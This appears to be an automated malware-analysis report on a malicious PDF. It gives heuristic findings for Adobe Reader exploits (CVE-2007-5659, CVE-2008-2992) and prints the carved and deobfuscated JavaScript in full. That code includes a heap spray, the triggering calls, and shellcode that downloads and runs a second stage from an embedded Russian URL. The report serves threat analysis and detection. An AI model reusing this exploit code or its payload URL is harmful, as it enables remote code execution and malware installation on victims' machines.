Verdict: MALICIOUS
Risk Score: 378

Machine Learning
- Nyx PDF Classifier malicious score 1.0000

Heuristics (9)

- Collab.collectEmailInfo — CVE-2007-5659 [critical, CVE exact, rule CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- util.printf — CVE-2008-2992 [critical, CVE exact, rule CVE_2008_2992]: PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- JavaScript action [low, 4 related findings, rule PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Obfuscated multi-stage PDF JavaScript heap-spray exploit [critical, rule PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY]: PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
- PDF JavaScript exploit cluster [critical, rule PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: var A34l = eval(B34l);
- PDF exploit shellcode contains an embedded download URL [high, rule PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream [low, rule PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact [info, rule EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, rule EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://lxenia.ru/wp-image/load.php?stat=Windows (referenced by PDF JavaScript)

Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x3D7 | 14011 bytes |

SHA-256: 3328389c2185ae1862b7968b2cdf6f70310fe6db057e14105f229c1b93dfdb9d

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 3 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):
var B34l = "1e234v567a89l0";
B34l = B34l.replace(/[\+1234567890]/g, "");
var A34l = eval(B34l);
var s = "<dot-separated decimal char-code string omitted>".replace(/[A-Za-z]/g,function (c){return String.fromCharCode((((c = c.charCodeAt(0)) & 223) - 52) % 26 + (c & 32) + 65);}).split(".");
var B34l = "";
for (var i=0; i<s.length; i++){ B34l += String.fromCharCode(s[i]); }
function uSQXcfcd2(){
A34l(B34l);
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| numeric_charcode_stage_000.js | deobfuscated-js | numeric char-code string decoded JavaScript at offset 0x445 | 4260 bytes |

SHA-256: f4481ca0b14254d49b6f193e48ba4ab22faeb3fa22184d39f4e0c2787ab831d2

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 5 eval/decoder/string-building token(s).

Preview script (first 1,000 lines of the extracted script):
function b1235bC34l(b1235bD34l, b1235bW34l){ while (b1235bD34l.length*2<b1235bW34l){b1235bD34l += b1235bD34l;} b1235bD34l = b1235bD34l.substring(0,b1235bW34l/2); return b1235bD34l; } function b1235bE34l(num, content){ var z = ""; for (var i = 0; i < num; i++){ z += content.toString(); } return z; } var b1235bF34l = app.viewerVersion.toString(); b1235bF34l = b1235bF34l.replace(/\D/g,""); var b1235bG34l = new Array(b1235bF34l.charAt(0),b1235bF34l.charAt(1),b1235bF34l.charAt(2)); if (b1235bG34l[0] == 8 && b1235bG34l[1] == 1 && b1235bG34l[2] == 2){ var b1235bK34l = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6C2F%u6578%u696E%u2E61%u7572%u772F%u2D70%u6D69%u6761%u2F65%u6F6C%u6461%u702E%u7068%u733F%u6174%u3D74%u6957%u646E%u776F%u2073%u5058%u497C%u746E%u7265%u656E%u2074%u7845%u6C70%u726F%u7265%u3620%u302E%u527C%u7C55%u3139%u372E%u2E37%u3332%u2E38%u3137"); var b1235bC34l = unescape("%u0A0A%u0A0A"); var b1235bD34l = 20; var b1235bH34l = b1235bD34l+b1235bK34l.length; while (b1235bC34l.length < b1235bH34l) b1235bC34l += b1235bC34l; var b1235bL34l = b1235bC34l.substring(0, b1235bH34l); var b1235bM34l = b1235bC34l.substring(0, b1235bC34l.length - b1235bH34l); while (b1235bM34l.length + b1235bH34l < 0x60000) b1235bM34l=b1235bM34l+b1235bM34l+b1235bL34l; var b1235bN34l = new Array(); for (b1235bO34l = 0; b1235bO34l < 1200; 
b1235bO34l++){ b1235bN34l[b1235bO34l] = b1235bM34l + b1235bK34l } var b1235bP34l = 12 + b1235bE34l(18, 9) + b1235bE34l(276, 8); var b1235bA3qIo = "12%34@5@0@0@0123f@"; b1235bA3qIo = b1235bA3qIo.replace(/[123@]/g, ""); util.printf(b1235bA3qIo,b1235bP34l); } else { var b1235bK34l = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6C2F%u6578%u696E%u2E61%u7572%u772F%u2D70%u6D69%u6761%u2F65%u6F6C%u6461%u702E%u7068%u733F%u6174%u3D74%u6957%u646E%u776F%u2073%u5058%u497C%u746E%u7265%u656E%u2074%u7845%u6C70%u726F%u7265%u3620%u302E%u527C%u7C55%u3139%u372E%u2E37%u3332%u2E38%u3137"); var b1235bA93IwonQ = "@0@x@0@c@0@c@0@c@0@c@"; b1235bA93IwonQ = b1235bA93IwonQ.replace(/[@]/g, ""); var b1235bB93IwonQ = "@0@x@4@0@@0@@0@@0@0@"; b1235bB93IwonQ = b1235bB93IwonQ.replace(/[@]/g, ""); var b1235bQ34l = new Array(); var b1235bP34l = b1235bA93IwonQ; var b1235bM34l = b1235bB93IwonQ; var b1235bN34l = b1235bK34l.length * 2; var b1235bW34l = b1235bM34l - (b1235bN34l+0x38); var b1235bQ92SilN = "@%@u@9@0@9@0@%@u@9@0@9@0@"; b1235bQ92SilN = b1235bQ92SilN.replace(/[@]/g, ""); var b1235bD34l = unescape(b1235bQ92SilN); b1235bD34l = b1235bC34l(b1235bD34l, b1235bW34l); var b1235bL34l = (b1235bP34l - b1235bB93IwonQ)/b1235bM34l; for (var b1235bC93IwonQ=0;b1235bC93IwonQ<b1235bL34l;b1235bC93IwonQ++){ b1235bQ34l[b1235bC93IwonQ] = b1235bD34l + b1235bK34l; } var 
b1235bEio95EinA = "@%@u@0@c@0@c@%@u@0@c@0@c@"; b1235bEio95EinA = b1235bEio95EinA.replace(/[@]/g, ""); var b1235bO34l = unescape(b1235bEio95EinA); while(b1235bO34l.length < 44952) b1235bO34l += b1235bO34l; this.collabStore = Collab.collectEmailInfo({subj: "",msg: b1235bO34l}); }